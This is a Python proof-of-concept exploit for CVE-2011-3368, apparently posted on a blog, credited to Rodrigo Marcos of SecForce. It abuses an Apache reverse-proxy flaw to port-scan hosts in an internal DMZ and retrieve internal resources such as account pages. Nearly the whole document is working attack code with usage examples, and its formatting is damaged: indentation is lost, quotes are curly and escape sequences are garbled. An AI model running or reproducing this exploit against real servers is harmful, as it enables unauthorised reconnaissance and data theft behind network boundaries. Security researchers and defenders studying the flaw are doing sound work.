[cc lang=”python”]#!/usr/bin/env python

import socket
import string
import getopt, sys

known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]

def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):

get = “GET ” + url + “@” + internal_target + “:” + internal_port + “/” + resource + ” HTTP/1.1rn”
get = get + “Host: ” + apache_target + “rnrn”

remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remoteserver.settimeout(3)

try:
remoteserver.connect((apache_target, int(apache_port)))
remoteserver.send(get)
return remoteserver.recv(4096)
except:
return “”

def get_banner(result):
return result[string.find(result, “rnrn”)+4:]

def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):

print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
for port in tested_ports:
port = str(port)
result = send_request(url, apache_target, apache_port, internal_target, port, resource)
if string.find(result,”HTTP/1.1 200″)!=-1 or
string.find(result,”HTTP/1.1 30″)!=-1 or
string.find(result,”HTTP/1.1 502″)!=-1:
print “- Open port: ” + port + “/TCP”
print get_banner(result)
elif len(result)==0:
print “- Filtered port: ” + port + “/TCP”
else:
print “- Closed port: ” + port + “/TCP”

def usage():
print
print “CVE-2011-3368 proof of concept by Rodrigo Marcos”
print “http://www.secforce.co.uk”
print
print “usage():”
print “python apache_scan.py [options]”
print
print ” [options]”
print ” -r: Remote Apache host”
print ” -p: Remote Apache port (default is 80)”
print ” -u: URL on the remote web server (default is /)”
print ” -d: Host in the DMZ (default is 127.0.0.1)”
print ” -e: Port in the DMZ (enables ‘single port scan’)”
print ” -g: GET request to the host in the DMZ (default is /)”
print ” -h: Help page”
print
print “examples:”
print ” – Port scan of the remote host”
print ” python apache_scan.py -r www.example.com -u /images/test.gif”
print ” – Port scan of a host in the DMZ”
print ” python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local”
print ” – Retrieve a resource from a host in the DMZ”
print ” python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html”
print

def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
print
print “CVE-2011-3368 proof of concept by Rodrigo Marcos”
print “http://www.secforce.co.uk”
print
print ” [+] Target: ” + apache_target
print ” [+] Target port: ” + apache_port
print ” [+] Internal host: ” + internal_target
print ” [+] Tested ports: ” + str(tested_ports)
print ” [+] Internal resource: ” + resource
print

def main():

global apache_target
global apache_port
global url
global internal_target
global internal_port
global resource

try:
opts, args = getopt.getopt(sys.argv[1:], “u:r:p:d:e:g:h”, [“help”])
except getopt.GetoptError:
usage()
sys.exit(2)

try:
for o, a in opts:
if o in (“-h”, “–help”):
usage()
sys.exit(2)
if o == “-u”:
url=a
if o == “-r”:
apache_target=a
if o == “-p”:
apache_port=a
if o == “-d”:
internal_target = a
if o == “-e”:
internal_port=a
if o == “-g”:
resource=a

except getopt.GetoptError:
usage()
sys.exit(2)

if apache_target == “”:
usage()
sys.exit(2)

url = “/”
apache_target = “”
apache_port = “80”
internal_target = “127.0.0.1”
internal_port = “”
resource = “/”

main()

if internal_port!=””:
tested_ports = [internal_port]
else:
tested_ports = known_ports

scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)

[/cc]